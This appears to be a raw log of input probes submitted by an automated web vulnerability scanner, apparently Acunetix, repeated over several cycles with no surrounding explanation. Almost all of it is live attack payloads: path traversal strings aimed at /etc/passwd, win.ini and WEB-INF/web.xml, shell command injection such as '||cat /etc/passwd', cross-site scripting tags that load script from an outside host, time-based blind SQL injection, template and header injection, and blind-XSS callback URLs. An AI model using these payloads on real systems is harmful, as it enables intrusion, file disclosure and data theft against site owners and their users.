..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

IPsHahHP'

1

&dir

1

1

1

1

1

comments

http://www.acunetix.tst

CQ9WDc2S')

1

file:///etc/passwd

'&dir&'

'"

1

comments/.

1'"()&%<ScRiPt >prompt(965155)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

oR4wzgtc'))

1

1

"&dir&"

<!--

1

'"()&%<ScRiPt >prompt(939061)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

1

1_956771

WEB-INF\web.xml

1

'|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu4214\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4214

../../../../../../../../../../boot.ini

1

1

acux9126\xc0\xbez1\xc0\xbcz2a\x90bcxuca9126

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(923175)</ScRiPt>

1

1

1

1

1<script>prompt(932598)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(982373)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915386></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(998232)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(936781)">

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988268)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(981788))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9078245*9047854)

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(974276)>

'+response.write(9078245*9047854)+'

WEB-INF/web.xml

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906088)>

1

1

"+response.write(9078245*9047854)+"

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(911256)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(939047)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(991168)</sCripT>

1

1

cat /etc/passwd

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&lt

1

-1

${100203+99385}

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(919400) //\xf6>

1

-1)

1&n904913=v915025

1

|cat /etc/passwd#

)

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(984787)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

<a href='http://www.acunetix.com'>website security</a>

1

zNMrCalL'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

nugd8esZ')

'

/etc/passwd

1

1

1_XLRl3 <ScRiPt >prompt(963864)</ScRiPt>

1

1

1

"

c3A5XZxH'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

'

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

"

1

1

http://hityoryw29LpO.bxss.me/

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

http://www.acunetix.tst

1

1

A49WWhic'

&dir

1

'"

comments

1'"()&%<ScRiPt >prompt(997469)</ScRiPt>

1

sw6lvNEI')

file:///etc/passwd

'&dir&'

1

comments

<!--

'"()&%<ScRiPt >prompt(911997)</ScRiPt>

pscdq3pL'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

1_966556

1

"&dir&"

1

1

1

1

WEB-INF/web.xml

1

|dir

1

1

WEB-INF\web.xml

1

1

'|dir

acu3617\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3617

1

1

../../../../../../../../../../windows/win.ini

acux2643\xc0\xbez1\xc0\xbcz2a\x90bcxuca2643

"|dir

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(921688)</ScRiPt>

1

1

1

1

1<script>prompt(906630)</script>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(957254)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963490></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(956843)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(975814)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932308)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(951521))>

1

1

1

1<iframe src='data:text/html

response.write(9931704*9017036)

1

1

WEB-INF/web.xml

&cat /etc/passwd&

1<body onload=prompt(907046)>

'+response.write(9931704*9017036)+'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930902)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9931704*9017036)+"

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(6.312),0)/*'XOR(if(now()=sysdate(),sleep(6.312),0))OR'"XOR(if(now()=sysdate(),sleep(6.312),0))OR"*/

1<img src=xyz OnErRor=prompt(955673)>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6.312)))v)/*'+(select(0)from(select(sleep(6.312)))v)+'"+(select(0)from(select(sleep(6.312)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1<img/src=">" onerror=alert(949756)>

1

1

1

1

1

-1

1

${99153+100276}

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(953119)</sCripT>

`cat /etc/passwd`

1

1

1

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n949654=v986743

1

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(917189) //\xf6>

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

fNYBXP5g'

1

1<input autofocus onfocus=prompt(925070)>

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

!(()&&!|*|*|

'"()

1

1

VFXmCkee')

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

[url=http://www.acunetix.com]website security[/url]

1

oBPQkuZq'))

1

1

1

/etc/passwd

1

"

1_anxZq <ScRiPt >prompt(964245)</ScRiPt>

'

1

-1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

||cat /etc/passwd

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitrqx6JRjDB2.bxss.me/

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

xOeNLeBR'

1

&dir

1

acunetix_wvs_invalid_filename

1

1

1

http://www.acunetix.tst

ixERQkPD')

file:///etc/passwd

1'"()&%<ScRiPt >prompt(924845)</ScRiPt>

comments

'"

'&dir&'

TexHb5JG'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(964759)</ScRiPt>

1

comments

<!--

1

"&dir&"

1_947856

WEB-INF/web.xml

1

1

comments/.

1

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

acu5110\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5110

1

1

"|dir

../../../../../../../../../../boot.ini

1

acux4732\xc0\xbez1\xc0\xbcz2a\x90bcxuca4732

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(930393)</ScRiPt>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(925916)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(934127)</ScRiPt>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914202></ScRiPt>

1

1

1

1<ScRiPt >prompt(947295)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988076)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939329)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(951581))>

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

response.write(9330110*9197930)

1<body onload=prompt(900811)>

1

1

1

WEB-INF\web.xml

&cat /etc/passwd&

'+response.write(9330110*9197930)+'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904369)>

'&cat /etc/passwd&'

"+response.write(9330110*9197930)+"

1

1

1<img src=xyz OnErRor=prompt(913553)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1<img/src=">" onerror=alert(932009)>

if(now()=sysdate(),sleep(3.5),0)/*'XOR(if(now()=sysdate(),sleep(3.5),0))OR'"XOR(if(now()=sysdate(),sleep(3.5),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<ScRiPt%20>prompt(973333)</sCripT>

1

1

(select(0)from(select(sleep(3.5)))v)/*'+(select(0)from(select(sleep(3.5)))v)+'"+(select(0)from(select(sleep(3.5)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1&lt

${99529+100228}

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n938592=v999123

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(960919) //\xf6>

1

-1)

1

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(904316)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

-1))

<a href='http://www.acunetix.com'>website security</a>

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

ufBjf9av'

testasp.vulnweb.com

1

'"()

1

^(#$!@#$)(()))******

1_XzytX <ScRiPt >prompt(969687)</ScRiPt>

b71xDhF8')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

'

1

1

1

1

uGY7sZcy'))

"

/etc/passwd

1

1

"

-1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

-1))

http://hitdDpUPlBV2Q.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

1

YIzAeVpF'

comments

1

1

1

1

'"

dA99QE5S')

1

"&dir&"

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(943259)</ScRiPt>

<!--

1

1

IPH55WiB'))

|dir

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(998114)</ScRiPt>

1

1

'|dir

1

1

WEB-INF/web.xml

1_966205

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu6843\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6843

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux10167\xc0\xbez1\xc0\xbcz2a\x90bcxuca10167

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(973719)</ScRiPt>

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(982282)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(978665)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985168></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(952442)</ScRiPt>

response.write(9571911*9828615)

1

1

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(976341)">

'+response.write(9571911*9828615)+'

WEB-INF/web.xml

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979593)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

"+response.write(9571911*9828615)+"

1

1

WEB-INF\web.xml

1

1<div style=width:expression(prompt(941921))>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100042+100216}

1<body onload=prompt(958519)>

1

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953897)>

1

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1&n964199=v932804

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1<img src=xyz OnErRor=prompt(992689)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

testasp.vulnweb.com

!(()&&!|*|*|

1<img/src=">" onerror=alert(970393)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

'"()

^(#$!@#$)(()))******

1

1

1<ScRiPt%20>prompt(964546)</sCripT>

1

'

'

1

hVcUCnnP'

1

1

/etc/passwd

1&lt

1

1

"

TN5WErDq')

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(954567) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

L9hK4Iyf'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(946139)>

${@print(md5(acunetix_wvs_security_test))}\

1

-1

http://hitPm9j9ohp6j.bxss.me/

1

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

-1)

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments

[url=http://www.acunetix.com]website security[/url]

-1))

'&dir&'

'"

1

1

1

comments

dt9Nv67D'

1_rYc0V <ScRiPt >prompt(934212)</ScRiPt>

file:///etc/passwd

"&dir&"

1

<!--

1'"()&%<ScRiPt >prompt(944255)</ScRiPt>

1

comments/.

1

05BKAJNT')

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(996331)</ScRiPt>

|dir

1

1

1

iebu8zZj'))

WEB-INF/web.xml

1

1

1_948021

1

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

acu2638\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2638

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acux6865\xc0\xbez1\xc0\xbcz2a\x90bcxuca6865

../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(984315)</ScRiPt>

1

1

1<script>prompt(938506)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(931871)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987397></ScRiPt>

1

1

1

1<ScRiPt >prompt(963160)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(945961)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954184)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(954398))>

1

1

response.write(9330965*9738733)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

1

&cat /etc/passwd&

'+response.write(9330965*9738733)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(997834)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945653)>

"+response.write(9330965*9738733)+"

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(950062)>

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(994751)>

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(944649)</sCripT>

`cat /etc/passwd`

1

1

1

1

1

-1

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

${100461+99722}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

\xf6<img acu onmouseover=prompt(931361) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

1

1&n994227=v955192

)

1some_inexistent_file_with_long_name%00.jpg

-1))

1<input autofocus onfocus=prompt(976621)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ugI23IKf'

<a href='http://www.acunetix.com'>website security</a>

'"()

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

'

[url=http://www.acunetix.com]website security[/url]

3kfS1KGj')

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

VPZE8fkl'))

1_2pmsb <ScRiPt >prompt(918473)</ScRiPt>

1

1

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1

||cat /etc/passwd

1

1

http://hitoj37JJ2VJM.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

&dir

1

1

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

http://www.acunetix.tst

'"

vCgtMB9T'

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(980527)</ScRiPt>

comments

file:///etc/passwd

1

xvhBZagk')

<!--

1

|dir

'"()&%<ScRiPt >prompt(939277)</ScRiPt>

JTYwlq7K'))

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1_982583

1

WEB-INF/web.xml

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu1659\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1659

1

1

../../../../../../../../../../boot.ini

1

1

acux7154\xc0\xbez1\xc0\xbcz2a\x90bcxuca7154

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(989936)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(921013)</script>

1

1

1<ScRiPt >prompt(995027)</ScRiPt>

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957894></ScRiPt>

1

1

1<ScRiPt >prompt(931620)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(939710)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954698)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(935600))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

response.write(9734028*9566319)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<body onload=prompt(907222)>

1

1

'+response.write(9734028*9566319)+'

&cat /etc/passwd&

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990699)>

1

1

1

"+response.write(9734028*9566319)+"

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(915128)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

1

1

../../../../../../../../../../etc/passwd

1<img/src=">" onerror=alert(993094)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(944007)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&lt

1

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

${99090+99999}

1

-1

\xf6<img acu onmouseover=prompt(914617) //\xf6>

1

1

1

1

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<input autofocus onfocus=prompt(977971)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n958498=v923007

1

-1))

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'"()

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

fFiRRrIg'

[url=http://www.acunetix.com]website security[/url]

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1

testasp.vulnweb.com

Ccqsq3cy')

1_rtJGw <ScRiPt >prompt(958233)</ScRiPt>

1

1

1

'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

EZczZn8f'))

1

